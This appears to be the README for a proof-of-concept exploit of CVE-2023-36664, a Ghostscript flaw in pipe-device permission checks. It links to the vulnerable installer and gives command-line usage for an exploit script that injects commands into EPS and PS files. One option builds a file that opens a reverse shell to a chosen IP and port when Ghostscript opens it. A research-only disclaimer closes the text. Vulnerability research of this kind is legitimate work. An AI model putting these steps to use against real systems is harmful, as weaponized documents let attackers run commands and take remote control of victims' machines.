Vulnerability disclosed in Ghostscript prior to version 10.01.2 leads to code execution (CVSS score 9.8).

Official vulnerability description:

Artifex Ghostscript through 10.01.2 mishandles permission validation for pipe devices (with the %pipe% prefix or the | pipe character prefix).

Debian released a security advisory mentioning possible execution of arbitrary commands:

"It was discovered that Ghostscript, the GPL PostScript/PDF interpreter, does not properly handle permission validation for pipe devices, which could result in the execution of arbitrary commands if malformed document files are processed."

The repo is created for a CVE analysis blog post available on vsociety blog.

Download Ghostscript 10.01.1 here: https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/tag/gs10011 Direct link to Windows x64 executable: https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs10011/gs10011w64.exe

The exploitation can occur upon opening a PS or EPS file and can allow code execution caused by Ghostscript mishandling permission validation for pipe devices.

Usage: python3 CVE_2023_36664_exploit.py <input_file> <command>

Example:

python3 CVE_2023_36664_exploit.py file.eps "calc"

This generates a new file called file_injected.eps.

Open this with Ghostscript to trigger the calculator (since version 9.50 you also have to use -dNOSAFER option):

gs10011w64.exe -dNOSAFER .\file_injected.eps

Other examples: Generate a new EPS file called run_calculator.eps with payload "calc" (pops up a new calculator on Windows)

python3 CVE_2023_36664_exploit.py --generate --payload calc --filename run_calculator --extension eps

Generate a new EPS file called rev_shell.eps with a custom IP (start a reverse shell when triggered on Unix)

python3 CVE_2023_36664_exploit.py --generate --revshell -ip 10.10.10.10 -port 4242 --filename trigger_revshell --extension eps

Generate a new PS file malicius.ps with payload "calc" (pops up a new calculator on Windows)

python3 CVE_2023_36664_exploit.py -g -p "calc" -x ps

Inject malicious custom payload ("calc") to an existing file called file.eps (pops up a new calculator on Windows)

python3 CVE_2023_36664_exploit.py --inject --payload "calc" --filename file.eps

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.